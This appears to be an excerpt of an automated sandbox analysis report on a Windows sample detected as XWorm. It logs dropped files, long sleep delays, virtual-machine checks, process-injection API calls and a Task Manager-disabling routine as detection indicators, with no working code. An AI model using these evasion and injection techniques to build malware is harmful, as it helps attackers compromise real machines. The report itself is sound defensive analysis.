Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 17F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 1020000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 4980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 3090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 3270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 30E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 30F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 50D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 860000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 4440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 9D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 10E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 7B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4380000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Window / User API: threadDelayed 811			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Window / User API: threadDelayed 9178			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 1496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 4124	Thread sleep count: 811 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 4124	Thread sleep time: -811000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 4124	Thread sleep count: 9178 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 4124	Thread sleep time: -9178000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 1488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 5348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 1892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 2680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5316	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 5636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 2584	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 4788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 6120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 6164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\fzP.exe TID: 6136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7104	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: wscript.exe, 00000000.00000002.2048119654.000001AF2FCF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yl+
Source: fzP.exe, 00000003.00000002.3319601330.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`

Source: C:\Users\user\AppData\Local\Temp\fzP.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: fzP.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: 2.2.fzP.exe.3235fac.2.raw.unpack, reflect.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 2.2.fzP.exe.3235fac.2.raw.unpack, reflect.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 2.2.fzP.exe.3235fac.2.raw.unpack, reflect.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\fzP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to disable the Task Manager (.Net Source)

Source: fzP.exe.0.dr, Program.cs	.Net Code: TaskMan
Source: 0.3.wscript.exe.1af3297ee40.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: 0.2.wscript.exe.1af32851b90.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: 0.3.wscript.exe.1af3297ee40.1.raw.unpack, Program.cs	.Net Code: TaskMan
Source: Service.exe.2.dr, Program.cs	.Net Code: TaskMan

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 5.2.fzP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.fzP.exe.3232718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2ddc78c.1.raw.unpack, type: UNPACKEDPE
